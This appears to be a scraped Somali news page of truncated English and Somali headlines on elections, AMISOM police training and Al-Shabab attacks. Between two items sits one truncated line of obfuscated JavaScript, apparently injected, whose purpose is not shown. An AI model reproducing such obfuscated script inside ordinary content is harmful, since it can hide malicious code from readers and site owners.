Somali Police Force trained in community policing to counter extremism.
The African Union Mission in Somalia (AMISOM) has commenced a week-long community policing training in Mogadishu, to boost the skills of the Somali Police Force (SPF) in countering violent extremism, through enhanced collaboration and partnership with the community.
Facilitated by the AMISOM Police component, the training at the General Kahiye Police Academy in Mogadishu, for 25 SPF personnel, was jointly...
Xaniifa oo la kulantay guddiga loo saaray xaqiijinta qoondada haweenka
Wasiirka wasaaradda haweenka XFS Xaniifa Maxamed Ibraahim (Xaabsade) ayaa maanta kulan gaar ah la qaadatay guddiga loo xil-saaray xaqiijinta qoondada haweenka iyo ku xigeenka Ergayga Qaramada Midoobey ee Soomaaliya.
Qoraal ay wasiir Xaniifa ka soo saartay kulankaas waxay ku tiri, “Waxaan maanta kulan laqaadanay aniga iyo gudiga xaqiijinta qoondada dumarka dhowaan Raisulwasaaraha magacaabay (Goodwill Ambsaddors) kuxigeenka Qaramada Midoobey DSRSG Anita...
Maxaa kasoo baxay kulankii Rooble & guddiga doorashada G/Waqooyi
Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble oo kulan la qaatay Guddiga doorashooyinka Xildhibaannada labada gole ee Gobollada Waqooyi, ayaa sheegay in xubnaha guddiga laga doonayo in ay ka madax banaanaadaan siyaasadda iyo aragtida dhinacyada, ayna si siman ugu adeegaan dhammaan muwaadiniinta u tartamaya kuraasta ay doorashadooda hagayaan.
Ra’iisul Wasaaraha ayaa xusay in laga noqday doorashadii lagu murmay...
Golaha wakiilada Somaliland oo doortay guddoon cusub
Xildhibaanada golaha wakiilada Somaliland ayaa maanta oo Isniin ah doortay guddoomiye, ku xigeenadiisa koowaad iyo labaad, kadib doorasho ka dhacday magaalada Hargeysa.
Guddoomiyaha cusub ee golaha wakiilada Somaliland ayaa waxaa loo doortay, Mduane Cabdirisaaq Khaliif Axmed oo ka sharraxnaa xisbiga mucaaradka ah ee Wadani.
Cabdirisaaq ayaa 42 cod kaga guuleystay, Yaasiin Xaaji Maxamuud Faratoon oo isna metalayey xisbiga muxaafadka ah ee...
Soomaaliya oo gashay kalmaha ugu horreeya tartanka oradka
oomaaliya ayaa kamid noqotay 10-Wadan ee kaalmaha ugu horeya ka galay tartanka ciyaarta oradada (Olympic) oo lagu qabatay Dalka Japan
Cali idow Cali oo Soomaaliya ku matalayay tartanka ayaa galay kaalinta 10-aad isaga oo ka sara maray wadama badan oo ay ka mid yihiin Spain, Poland, Qatar iyo Brazil!.
Cali ayaa sidaa ugu gudbay wareegga 2-aad ee tartanka
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...
RW Rooble oo la kulmayo guddiga doorashooyinka Gobollada Waqooyi
Ra’iisul Wasaaraha Xukuumadda Federaalka ah ee Soomaaliya ayaa lagu wadaa in uu maanta xafiiskiisa kulan kula qaato xubnaha Guddiga Doorashooyinka Xildhibaanada Gobolada Waqooyi.
Ra’iisul Wasaare Maxamed Xuseen Rooble ayaa wado dadaal xoogan oo uu ku doonayo in doorashada xildhibaanada kasoo jeedo gobolada waqooyi ay ku dhacaan si cadaalad iyo sinaan leh.
Xubnaha Guddiga Doorashooyinka ee Xildhibaanada kasoo jeedo Goboladda waqooyi ayaa...
Madaxweyne Siciid Deni oo loo diray dalab la xiriira doorashada Aqalka Sare
Guddiga maamulka doorashada heer dowlad Goboleed ee Puntland ayaa warqad codsi ah u diray Madaxwaynaha maamulkaasi Mudane Siciid Cabdullaahi Deni.
Warqad kasoo baxday xafiiska guddoomiyaha guddiga, Cabdikariin Muuse Maxamed ayaa waxaa Deni looga dalbaday inuu soo saaro liiska xubnaha u tartamaya Aqalka Sare.
Sidoo kale guddiga ayaa shaaca ka qaaday in la joogo waqtigii lagu heshiiyey qabashada doorashada Golaha Aqalka Sare,...
Al-Shabab militant kills 3 Kenyans in border town
Al-Shabab militants killed three Kenyans over the weekend in two separate terror attacks in northeastern Kenya's Mandera County, authorities confirmed on Monday.
Rono Bunei, northeastern regional police commander, confirmed the two incidents near the Somalia border, saying three others were injured during the attacks.
In the first attack, the militants ambushed three people who were traveling in a vehicle from Fino...
Somali army says captures key areas from Al-Shabab militants
The Somali National Army (SNA) on Monday morning captured some key areas in Qaycad, in Mudug region, after heavy fighting against the militant group of al-Shabab, officials said.
The Ministry of Internal Security for Galmudug State said that SNA and Galmudug forces recovered a large number of weapons and communication equipment during the operation in central Somalia.
"We have completely taken...
U.S. Steps Up Air Strikes Against al-Qaeda Ally in Somalia
The U. S. is expanding air strikes against members of a group affiliated to al-Qaeda who’ve intensified attacks in Somalia since hundreds of American troops exited the country earlier this year.
The latest strike occurred close to the central towns of Bacadweyne and Geedaley on Sunday morning, hitting a position held by al-Shabaab militants who were engaging members of the...













